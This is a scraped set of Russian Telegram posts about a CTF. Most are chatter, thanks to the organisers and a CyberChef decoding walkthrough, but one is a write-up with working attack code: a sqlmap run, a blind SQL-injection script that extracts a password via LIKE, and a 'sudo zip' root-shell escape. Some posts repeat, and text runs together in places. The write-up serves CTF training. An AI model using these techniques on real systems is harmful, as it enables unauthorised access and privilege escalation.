Forwarded from KarKarichCTF
#квесты
Секретный кабинет от @karkarich_1, автора канала @KARkarich37
Сложность: легкий
Ссылка на задание
В задании дается хост и два порта: на одном из них веб сервис, а на другом ssh. Смотрим на сервис и видим форму для отправки пароля при этом форма отправляет еще и имя пользователя “josh”. Тогда запустим sqlmap и посмотрим, что он выводит. Sqlmap говорит, что password неуязвим, а вот username да!
Получается залогинится под Джоном, но на страничке все равно ничего нет( Тогда попробуем извлечь из БД его пароль, используя LIKE, чтобы залогиниться через ssh. Я это делал вот этим скриптом:
Видим, что можем выполнять команду zip от рута. Далее повышаем привилегии и все!
Секретный кабинет от @karkarich_1, автора канала @KARkarich37
Сложность: легкий
Ссылка на задание
В задании дается хост и два порта: на одном из них веб сервис, а на другом ssh. Смотрим на сервис и видим форму для отправки пароля при этом форма отправляет еще и имя пользователя “josh”. Тогда запустим sqlmap и посмотрим, что он выводит. Sqlmap говорит, что password неуязвим, а вот username да!
sqlmap -u "http://62.173.140.174:28780/login.php" --data "username=josh&password=asd" --method POST
Получается залогинится под Джоном, но на страничке все равно ничего нет( Тогда попробуем извлечь из БД его пароль, используя LIKE, чтобы залогиниться через ssh. Я это делал вот этим скриптом:
В итоге получаем хэш пароля и через crackstation.net подбираем сам пароль. Далее подключаемся по ssh и сразу прописываемimport requests as r
from string import printable
s = r.Session()
r0 = s.get("http://62.173.140.174:28780/login.php")
r1 = s.post("http://62.173.140.174:28780/login.php", data={"username":"josh", "password":"a"}).text
pas = ''
f = 1
while f:
f = 0
for i in printable:
if i in ["%", "_"]: continue
r2 = s.post("http://62.173.140.174:28780/login.php", data={"username":f"josh' AND password LIKE '{pas+i}%' #", "password":"a"}).text
if r2 != r1:
pas+=i
f = 1
break
print(pas)
sudo -l
Видим, что можем выполнять команду zip от рута. Далее повышаем привилегии и все!
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF
🔥6🤯2
Forwarded from infosec
• Очень объемное руководство, которое поможет вам разобраться в основах работы Wi-Fi:
#CheatSheet #WiFi
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8
Когда нашел всё:
Слитые пароли
Все никнеймы
Все айди
Админки
Почтовые клиенты
Мертвого слона
Обошёл все проверки на брут
Но не флаг.
Слитые пароли
Все никнеймы
Все айди
Админки
Почтовые клиенты
Мертвого слона
Обошёл все проверки на брут
Но не флаг.
Хочу признаться, когда я решал первый таск, у меня не получалось найти флаг, но зато, я нашёл ЭТОТ ШЕДЕВР. Я просто орал в голос
https://www.youtube.com/watch?v=wmHT6mu6B_0
https://www.youtube.com/watch?v=wmHT6mu6B_0
YouTube
Рубероид - Саша Серун - маменькин сынок / Все пранки
Рубероид - легендарный персонаж пранков, однажды насрал в подьезде и уже на протяжении нескольких лет отказывается отвечать за свой поступок
Телеграм - https://t.me/+UbozIDsfkVbhzYRa
Телеграм - https://t.me/+UbozIDsfkVbhzYRa
👍4
Потихоньку решаем задачки!
Могу сказать, что CTF крайне приятный. Организаторы подошли к таскам творчески, чувствуется атмосфера Just for Fun. Есть маленькие недочётики, но куда без них, согласитесь?
Надеюсь, что разбор тасков обязательно будет, может даже с видео!
Обязательно дам развернутую и правильную обратную связь по окончанию мероприятия. Если у вас есть что сказать, обязательно пишите. Все будут услышаны!
Могу сказать, что CTF крайне приятный. Организаторы подошли к таскам творчески, чувствуется атмосфера Just for Fun. Есть маленькие недочётики, но куда без них, согласитесь?
Надеюсь, что разбор тасков обязательно будет, может даже с видео!
Обязательно дам развернутую и правильную обратную связь по окончанию мероприятия. Если у вас есть что сказать, обязательно пишите. Все будут услышаны!
❤11👍1🔥1😴1💊1
Forwarded from Сашка Котофей
Ахахаха, глупый осинтер!!!! Я неуловоим!!!!!!
Это было великолепно
Хочу сказать большое спасибо всем, кто принимал участие. Организаторы были всегда на связи. Было много фана. Я просто в восторге
Хочу сказать большое спасибо всем, кто принимал участие. Организаторы были всегда на связи. Было много фана. Я просто в восторге
👍6🔥2❤1
Media is too big
VIEW IN TELEGRAM
Расширенная режиссерская версия
Всех еще раз с окончанием этого прекрасного мероприятия!
Идите спать
Всех еще раз с окончанием этого прекрасного мероприятия!
Идите спать
❤9🔥5
Мой дорогой друг, БРАТ, сдал экзамен по отрыжке (Burp)
Если у вас есть вопросики и вы стремитесь стать кибер-котлетами учитесь и пишите ему!
https://t.me/wr3dmast3rvs/46
Если у вас есть вопросики и вы стремитесь стать кибер-котлетами учитесь и пишите ему!
https://t.me/wr3dmast3rvs/46
Telegram
wr3dmast3r vs pentest
Наконец-то дошли руки до повторной сдачи экзамена.
При первой попытке полгода назад в ходе решения у меня не получилось найти ни одной уязвимости, из-за чего было тяжело реабилитироваться.
Но эти полгода не прошли даром. После прохождения 90% лабораторных…
При первой попытке полгода назад в ходе решения у меня не получилось найти ни одной уязвимости, из-за чего было тяжело реабилитироваться.
Но эти полгода не прошли даром. После прохождения 90% лабораторных…
🔥5❤2
#crypto
HackOSINT
Бонусный трек
Билибизяка от @Max_RSC
Ссылка на задание
Сомневаюсь, что у кого-нибудь возникли трудности с первым этапом — это простейшее декодирование из binary. Инструмент Кибершеф, который для решения этого таска рекомендовали сами организаторы, автоматически определяет данную кодировку и любезно предлагает декодировать текст. Насколько я знаю, у большинства возникли трудности именно со вторым этапом.
Итак, после преобразования из binary мы получили непонятные 24 числа. Здесь надо применить рецепт From Float. Обратимся к документации Кибершефа и узнаем, какое преобразование производит этот рецепт:
IEEE754 — это стандарт, описывающий формат представления чисел с плавающей точкой. Используется, например, в компиляторах различных языков программирования.
Применяем рецепт From Float. Результат, который мы получили, не очень воодушевляет, но мы видим, что Кибершеф сразу подсказывает нам следующее преобразование: надо применить рецепт Gunzip. Делаем это и получаем строку в hex-нотации, которую Кибершеф снова предлагает нам декодировать, поначалу применив рецепт From Hex, а затем Url Decode. Так мы приходим к финальной строке, которая представляет собой стимовский урл:
иди решай задачу, не жульничай!
Идем по ссылке и находим флаг в имени юзера.
Кстати, кому-нибудь интересно, как выполнить преобразование From Float средствами Python? Если интересно, напишите об этом в комментариях — расскажу.
#HackOSINT2024
HackOSINT
Бонусный трек
Билибизяка от @Max_RSC
Ссылка на задание
Сомневаюсь, что у кого-нибудь возникли трудности с первым этапом — это простейшее декодирование из binary. Инструмент Кибершеф, который для решения этого таска рекомендовали сами организаторы, автоматически определяет данную кодировку и любезно предлагает декодировать текст. Насколько я знаю, у большинства возникли трудности именно со вторым этапом.
Итак, после преобразования из binary мы получили непонятные 24 числа. Здесь надо применить рецепт From Float. Обратимся к документации Кибершефа и узнаем, какое преобразование производит этот рецепт:
Convert from IEEE754 Floating Point Numbers
IEEE754 — это стандарт, описывающий формат представления чисел с плавающей точкой. Используется, например, в компиляторах различных языков программирования.
Применяем рецепт From Float. Результат, который мы получили, не очень воодушевляет, но мы видим, что Кибершеф сразу подсказывает нам следующее преобразование: надо применить рецепт Gunzip. Делаем это и получаем строку в hex-нотации, которую Кибершеф снова предлагает нам декодировать, поначалу применив рецепт From Hex, а затем Url Decode. Так мы приходим к финальной строке, которая представляет собой стимовский урл:
Идем по ссылке и находим флаг в имени юзера.
Кстати, кому-нибудь интересно, как выполнить преобразование From Float средствами Python? Если интересно, напишите об этом в комментариях — расскажу.
#HackOSINT2024
❤11🔥3👍2